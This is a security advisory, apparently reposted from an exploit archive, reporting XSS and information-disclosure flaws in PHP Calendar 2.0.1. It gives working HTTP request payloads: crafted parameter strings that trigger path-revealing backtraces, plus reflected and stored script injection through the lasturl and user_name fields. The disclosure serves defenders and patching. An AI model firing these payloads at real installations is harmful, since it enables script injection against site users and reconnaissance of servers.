PHP Calendar 2.0.1 XSS / Information Disclosure

2014.02.28
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| PHP Calendar Multiple vulnerabilities # Version .| php-calendar-2.0.1.zip # Date ....| 27.02.2014 # Found ...| HauntIT Blog # Home ....| http://sourceforge.net # ============================================================== [+] As guest # ============================================================== # 1. Information disclosure bug ---<request>--- GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1 Host: 10.149.14.62 ---<request>--- ---<response>--- <pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action') #1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action() #2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc() #3 {main}</pre> ---<response>--- # ============================================================== # 2. XSS ---<request>--- POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Type: application/x-www-form-urlencoded Content-Length: 104 lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd ---<request>--- # ============================================================== # 3. Information disclosure bug ---<request>--- POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 132 action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC ---<request>--- ---<response>--- <div class="phpc-main"><h2>Error</h2> <p>Malformed &quot;search-from&quot; date: &quot;\'`\&quot;;--#%/*&quot;</p> <h3>Backtrace</h3> <pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed &quot;sear...') #1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from') #2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results() #3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search() #4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval() #5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action() #6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc() #7 {main}</pre> ---<response>--- # ============================================================== # [+] From admin logged-in # ============================================================== #4. Persistent XSS ---<request>--- POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 197 phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa ---<request>--- # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top